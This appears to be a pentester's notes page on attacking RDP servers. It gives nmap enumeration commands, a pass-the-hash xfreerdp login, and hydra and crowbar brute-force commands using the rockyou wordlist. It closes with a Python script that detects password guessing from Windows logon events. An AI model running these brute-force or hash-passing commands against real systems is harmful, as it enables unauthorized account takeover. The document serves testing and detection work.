
RDP

Enumeration, exploitation and post-exploitation techniques for RDP servers.

Overview

RDP (Remote Desktop Protocol) listens on TCP port 3389 by default and provides a graphical remote session. It is enabled on many Windows servers and workstations.

Enumeration

nmap -sV -p 3389 $IP
nmap -p 3389 --script rdp-* $IP

Key scripts:

  • rdp-enum-encryption: enumerates the security layers and encryption levels the server accepts (Standard RDP, TLS, CredSSP/NLA)
  • rdp-vuln-ms12-020: tests whether the server is unpatched for the MS12-020 RDP vulnerability (denial of service)

Connect

xfreerdp /u:$user /p:$password /v:$IP
xfreerdp /u:$user /p:$password /v:$IP /cert:ignore
rdesktop $IP

Pass the hash directly (no plaintext password needed; this only succeeds when the target has Restricted Admin mode enabled):

xfreerdp /u:$user /pth:$hash /v:$IP

Brute Force

hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP
crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt
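Both brute-force tools above leave a clear trace on the target: every failed guess is written to the Windows Security log as Event ID 4625 (logon type 10, or type 3 when NLA is enabled and the failure happens in CredSSP), and a found password produces a 4624 from the same source address. The script below is an added example of the detection side, not part of the original notes: it counts 4625 events per source address in a sliding window, flags an address once a threshold is crossed, and raises the severity if that address later logs on successfully. The log lines, field layout, threshold and window size are constructed for the example; a real deployment would read the events from the Security log or a SIEM export instead.

```python
"""Detect RDP password guessing from Windows Security log events.

Added example, not part of the original notes. The input format
(timestamp|event_id|user|source_ip|logon_type) and all sample values are
constructed for this example.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one event per line.
# 203.0.113.7 hammers the administrator account and then gets in;
# 198.51.100.20 is a user who mistyped once and logged on later.
SAMPLE_LOG = """\
2024-05-01T10:00:01|4625|administrator|203.0.113.7|10
2024-05-01T10:00:02|4625|administrator|203.0.113.7|10
2024-05-01T10:00:03|4625|administrator|203.0.113.7|10
2024-05-01T10:00:04|4625|administrator|203.0.113.7|10
2024-05-01T10:00:05|4625|administrator|203.0.113.7|10
2024-05-01T10:00:06|4624|administrator|203.0.113.7|10
2024-05-01T10:05:00|4625|alice|198.51.100.20|10
2024-05-01T10:20:00|4624|alice|198.51.100.20|10
"""

FAIL_THRESHOLD = 5             # failed logons per source before alerting (assumed value)
WINDOW = timedelta(minutes=2)  # sliding window for counting failures (assumed value)
# 10 = RemoteInteractive (classic RDP); 3 = Network, which is how NLA/CredSSP
# failures show up in 4625 on the target host.
RDP_LOGON_TYPES = {"10", "3"}


def parse_line(line):
    """Split one constructed log line into (datetime, event_id, user, source_ip, logon_type)."""
    ts, event_id, user, src, logon_type = line.strip().split("|")
    return datetime.fromisoformat(ts), event_id, user, src, logon_type


def detect(lines, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return a list of (severity, source_ip, message) alerts.

    MEDIUM: `threshold` or more 4625 events from one source inside `window`.
    HIGH:   a 4624 from a source that was already flagged (guessing succeeded).
    """
    failures = defaultdict(deque)  # source_ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ts, event_id, user, src, logon_type = parse_line(line)
        if logon_type not in RDP_LOGON_TYPES:
            continue
        if event_id == "4625":
            recent = failures[src]
            recent.append(ts)
            # Drop failures that fell out of the window.
            while recent and ts - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("MEDIUM", src,
                               f"{len(recent)} failed RDP logons within {window} (last user: {user})"))
        elif event_id == "4624" and src in flagged:
            alerts.append(("HIGH", src,
                           f"successful RDP logon as {user} after password guessing"))
    return alerts


if __name__ == "__main__":
    for severity, src, msg in detect(SAMPLE_LOG.splitlines()):
        print(f"[{severity}] {src}: {msg}")
```

Running it on the sample prints one MEDIUM alert for 203.0.113.7 when the fifth failure lands and a HIGH alert when the following 4624 arrives; alice's single typo never reaches the threshold. The threshold and window are the knobs to tune against your own baseline of legitimate failed logons; hydra and crowbar produce dozens of failures per second, so even a conservative setting catches them, while an account lockout policy and NLA on the server side stop the guessing before the log fills up.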